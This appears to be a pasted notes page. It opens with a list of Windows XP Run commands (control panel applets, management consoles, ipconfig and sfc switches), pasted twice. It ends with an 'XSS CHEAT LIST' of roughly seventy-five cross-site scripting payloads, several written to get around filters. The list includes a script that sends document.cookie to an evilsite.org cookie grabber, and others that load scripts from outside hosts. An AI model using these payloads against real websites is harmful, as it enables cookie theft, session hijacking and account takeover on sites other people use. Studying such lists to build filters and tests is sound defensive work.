Run_Command

Accessibility Options : access.cpl
Add Hardware : hdwwiz.cpl
Add / Remove Programs : appwiz.cpl
Administrative Tools : control admintools
Automatic Updates : wuaucpl.cpl
Wizard file transfer Bluethooth : fsquirt
Calculator : calc
Certificate Manager : certmgr.msc
Character : charmap
Checking disk : chkdsk
Manager of the album (clipboard) : clipbrd
Command Prompt : cmd
Service components (DCOM) : dcomcnfg
Computer Management : compmgmt.msc
DDE active sharing : ddeshare
Device Manager : devmgmt.msc
DirectX Control Panel (if installed) : directx.cpl
DirectX Diagnostic Utility : dxdiag
Disk Cleanup : cleanmgr
System Information : dxdiag
Disk Defragmenter : dfrg.msc
Disk Management : diskmgmt.msc
Partition manager : diskpart
Display Properties : control desktop
Properties of the display (2) : desk.cpl
Properties display (tab “appearance”) : control color
Dr. Watson : drwtsn32
Manager vérirficateur drivers : check
Event Viewer : Eventvwr.msc
Verification of signatures of files : sigverif
Findfast (if present) : findfast.cpl
Folder Options : control folders
Fonts (fonts) : control fonts
Fonts folder windows : fonts
Free Cell : freecell
Game Controllers : Joy.cpl
Group Policy (XP Pro) : gpedit.msc
Hearts (card game) : mshearts
IExpress (file generator. Cab) : IExpress
Indexing Service (if not disabled) : ciadv.msc
Internet Properties : inetcpl.cpl
IPConfig (display configuration) : ipconfig / all
IPConfig (displays the contents of the DNS cache) : ipconfig / displaydns
IPConfig (erases the contents of the DNS cache) : ipconfig / flushdns
IPConfig (IP configuration cancels maps) : ipconfig / release
IPConfig (renew IP configuration maps) : ipconfig / renew
Java Control Panel (if present) : jpicpl32.cpl
Java Control Panel (if present) : javaws
Keyboard Properties : control keyboard
Local Security Settings : secpol.msc
Local Users and Groups : lusrmgr.msc
Logout : logoff
Microsoft Chat : winchat
Minesweeper (game) : winmine
Properties of the mouse : control mouse
Properties of the mouse (2) : main.cpl
Network Connections : control NetConnect
Network Connections (2) : ncpa.cpl
Network configuration wizard : netsetup.cpl
Notepad : notepad
NView Desktop Manager (if installed) : nvtuicpl.cpl
Manager links : packager
Data Source Administrator ODBC : odbccp32.cpl
Screen Keyboard : OSK
AC3 Filter (if installed) : ac3filter.cpl
Password manager (if present) : Password.cpl
Monitor performance : perfmon.msc
Monitor performance (2) : perfmon
Dialing Properties (phone) : telephon.cpl
Power Options : powercfg.cpl
Printers and Faxes : control printers
Private Character Editor : eudcedit
Quicktime (if installed) : QuickTime.cpl
Regional and Language Options : intl.cpl
Editor of the registry : regedit
Remote desktop connection : mstsc
Removable Storage : ntmsmgr.msc
requests the operator to removable storage : ntmsoprq.msc
RSoP (traduction. ..) (XP Pro) : rsop.msc
Scanners and Cameras : sticpl.cpl
Scheduled Tasks : control schedtasks
Security Center : wscui.cpl
Console management services : services.msc
shared folders : fsmgmt.msc
Turn off windows : shutdown
Sounds and Audio Devices : mmsys.cpl
Spider (card game) : spider
Client Network Utility SQL server : cliconfg
System Configuration Editor : sysedit
System Configuration Utility : msconfig
System File Checker (SFC =) (Scan Now) : sfc / scannow
SFC (Scan next startup) : sfc / scanonce
SFC (Scan each démarraget) : sfc / scanboot
SFC (back to default settings) : sfc / revert
SFC (purge cache files) : sfc / purgecache
SFC (define size CAHC x) : sfc / cachesize = x
System Properties : sysdm.cpl
Task Manager : taskmgr
Telnet client : telnet
User Accounts : nusrmgr.cpl
Utility Manager (Magnifier, etc) : utilman
Windows firewall (XP SP2) : firewall.cpl
Microsoft Magnifier : magnify
Windows Management Infrastructure : wmimgmt.msc
Protection of the accounts database : syskey
Windows update : wupdmgr
Introducing Windows XP (if not erased) : tourstart
Wordpad : write
Date and Time Properties : timedate.cpl
Accessibility Options : access.cpl
Add Hardware : hdwwiz.cpl
Add / Remove Programs : appwiz.cpl
Administrative Tools : control admintools
Automatic Updates : wuaucpl.cpl
Wizard file transfer Bluethooth : fsquirt
Calculator : calc
Certificate Manager : certmgr.msc
Character : charmap
Checking disk : chkdsk
Manager of the album (clipboard) : clipbrd
Command Prompt : cmd
Service components (DCOM) : dcomcnfg
Computer Management : compmgmt.msc
DDE active sharing : ddeshare
Device Manager : devmgmt.msc
DirectX Control Panel (if installed) : directx.cpl
DirectX Diagnostic Utility : dxdiag
Disk Cleanup : cleanmgr
System Information : dxdiag
Disk Defragmenter : dfrg.msc
Disk Management : diskmgmt.msc
Partition manager : diskpart
Display Properties : control desktop
Properties of the display (2) : desk.cpl
Properties display (tab “appearance”) : control color
Dr. Watson : drwtsn32
Manager vérirficateur drivers : check
Event Viewer : Eventvwr.msc
Verification of signatures of files : sigverif
Findfast (if present) : findfast.cpl
Folder Options : control folders
Fonts (fonts) : control fonts
Fonts folder windows : fonts
Free Cell : freecell
Game Controllers : Joy.cpl
Group Policy (XP Pro) : gpedit.msc
Hearts (card game) : mshearts
IExpress (file generator. Cab) : IExpress
Indexing Service (if not disabled) : ciadv.msc
Internet Properties : inetcpl.cpl
IPConfig (display configuration) : ipconfig / all
IPConfig (displays the contents of the DNS cache) : ipconfig / displaydns
IPConfig (erases the contents of the DNS cache) : ipconfig / flushdns
IPConfig (IP configuration cancels maps) : ipconfig / release
IPConfig (renew IP configuration maps) : ipconfig / renew
Java Control Panel (if present) : jpicpl32.cpl
Java Control Panel (if present) : javaws
Keyboard Properties : control keyboard
Local Security Settings : secpol.msc
Local Users and Groups : lusrmgr.msc
Logout : logoff
Microsoft Chat : winchat
Minesweeper (game) : winmine
Properties of the mouse : control mouse
Properties of the mouse (2) : main.cpl
Network Connections : control NetConnect
Network Connections (2) : ncpa.cpl
Network configuration wizard : netsetup.cpl
Notepad : notepad
NView Desktop Manager (if installed) : nvtuicpl.cpl
Manager links : packager
Data Source Administrator ODBC : odbccp32.cpl
Screen Keyboard : OSK
AC3 Filter (if installed) : ac3filter.cpl
Password manager (if present) : Password.cpl
Monitor performance : perfmon.msc
Monitor performance (2) : perfmon
Dialing Properties (phone) : telephon.cpl
Power Options : powercfg.cpl
Printers and Faxes : control printers
Private Character Editor : eudcedit
Quicktime (if installed) : QuickTime.cpl
Regional and Language Options : intl.cpl
Editor of the registry : regedit
Remote desktop connection : mstsc
Removable Storage : ntmsmgr.msc
requests the operator to removable storage : ntmsoprq.msc
RSoP (traduction. ..) (XP Pro) : rsop.msc
Scanners and Cameras : sticpl.cpl
Scheduled Tasks : control schedtasks
Security Center : wscui.cpl
Console management services : services.msc
shared folders : fsmgmt.msc
Turn off windows : shutdown
Sounds and Audio Devices : mmsys.cpl
Spider (card game) : spider
Client Network Utility SQL server : cliconfg
System Configuration Editor : sysedit
System Configuration Utility : msconfig
System File Checker (SFC =) (Scan Now) : sfc / scannow
SFC (Scan next startup) : sfc / scanonce
SFC (Scan each démarraget) : sfc / scanboot
SFC (back to default settings) : sfc / revert
SFC (purge cache files) : sfc / purgecache
SFC (define size CAHC x) : sfc / cachesize = x
System Properties : sysdm.cpl
Task Manager : taskmgr
Telnet client : telnet
User Accounts : nusrmgr.cpl
Utility Manager (Magnifier, etc) : utilman
Windows firewall (XP SP2) : firewall.cpl
Microsoft Magnifier : magnify
Windows Management Infrastructure : wmimgmt.msc
Protection of the accounts database : syskey
Windows update : wupdmgr
Introducing Windows XP (if not erased) : tourstart
Wordpad : write
Date and Time Properties : timedate.cpl

XSS CHEAT LIST


  1. <script>alert(1);</script>
  2.  
  3. <script>alert('XSS');</script>
  4.  
  5. <script src="http://www.evilsite.org/cookiegrabber.php"></script>
  6.  
  7. <script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="+escape(document.cookie)</script>
  8.  
  9. <scr<script>ipt>alert('XSS');</scr</script>ipt>
  10.  
  11. <script>alert(String.fromCharCode(88,83,83))</script>
  12.  
  13. <img src=foo.png onerror=alert(/xssed/) />
  14.  
  15. <style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style>
  16.  
  17. <? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?>
  18.  
  19. <marquee><script>alert('XSS')</script></marquee>
  20.  
  21. <IMG SRC=\"jav&#x09;ascript:alert('XSS');\">
  22.  
  23. <IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">
  24.  
  25. <IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">
  26.  
  27. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
  28.  
  29. "><script>alert(0)</script>
  30.  
  31. <script src=http://yoursite.com/your_files.js></script>
  32.  
  33. </title><script>alert(/xss/)</script>
  34.  
  35. </textarea><script>alert(/xss/)</script>
  36.  
  37. <IMG LOWSRC=\"javascript:alert('XSS')\">
  38.  
  39. <IMG DYNSRC=\"javascript:alert('XSS')\">
  40.  
  41. <font style='color:expression(alert(document.cookie))'>
  42.  
  43. '); alert('XSS
  44.  
  45. <img src="javascript:alert('XSS')">
  46.  
  47. <script language="JavaScript">alert('XSS')</script>
  48.  
  49. [url=javascript:alert('XSS');]click me[/url]
  50.  
  51. <body onunload="javascript:alert('XSS');">
  52.  
  53. <body onLoad="alert('XSS');"
  54.  
  55. [color=red' onmouseover="alert('xss')"]mouse over[/color]
  56.  
  57. "/></a></><img src=1.gif onerror=alert(1)>
  58.  
  59. window.alert("Bonjour !");
  60.  
  61. <div style="x:expression((window.r==1)?'':eval('r=1;
  62.  
  63. alert(String.fromCharCode(88,83,83));'))">
  64.  
  65. <iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
  66.  
  67. "><script alert(String.fromCharCode(88,83,83))</script>
  68.  
  69. '>><marquee><h1>XSS</h1></marquee>
  70.  
  71. '">><script>alert('XSS')</script>
  72.  
  73. '">><marquee><h1>XSS</h1></marquee>
  74.  
  75. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
  76.  
  77. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">
  78.  
  79. <script>var var = 1; alert(var)</script>
  80.  
  81. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
  82.  
  83. <?='<SCRIPT>alert("XSS")</SCRIPT>'?>
  84.  
  85. <IMG SRC='vbscript:msgbox(\"XSS\")'>
  86.  
  87. " onfocus=alert(document.domain) "> <"
  88.  
  89. <FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
  90.  
  91. <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
  92.  
  93. perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out
  94.  
  95. perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out
  96.  
  97. <br size=\"&{alert('XSS')}\">
  98.  
  99. <scrscriptipt>alert(1)</scrscriptipt>
  100.  
  101. </br style=a:expression(alert())>
  102.  
  103. </script><script>alert(1)</script>
  104.  
  105. "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
  106.  
  107. [color=red width=expression(alert(123))][color]
  108.  
  109. <BASE HREF="javascript:alert('XSS');//">
  110.  
  111. Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
  112.  
  113. "></iframe><script>alert(123)</script>
  114.  
  115. <body onLoad="while(true) alert('XSS');">
  116.  
  117. '"></title><script>alert(1111)</script>
  118.  
  119. </textarea>'"><script>alert(document.cookie)</script>
  120.  
  121. '""><script language="JavaScript"> alert('X \nS \nS');</script>
  122.  
  123. </script></script><<<<script><>>>><<<script>alert(123)</script>
  124.  
  125. <html><noalert><noscript>(123)</noscript><script>(123)</script>
  126.  
  127. <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
  128.  
  129. '></select><script>alert(123)</script>
  130.  
  131. '>"><script src = 'http://www.site.com/XSS.js'></script>
  132.  
  133. }</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
  134.  
  135. <SCRIPT>document.write("XSS");</SCRIPT>
  136.  
  137. a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);
  138.  
  139. ='><script>alert("xss")</script>
  140.  
  141. <script+src=">"+src="http://yoursite.com/xss.js?69,69"></script>
  142.  
  143. <body background=javascript:'"><script>alert(navigator.userAgent)</script>></body>
  144.  
  145. ">/XaDoS/><script>alert(document.cookie)</script><script src="http://www.site.com/XSS.js"></script>
  146.  
  147. ">/KinG-InFeT.NeT/><script>alert(document.cookie)</script>
  148.  
  149. src="http://www.site.com/XSS.js"></script>
  150.  
  151. data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=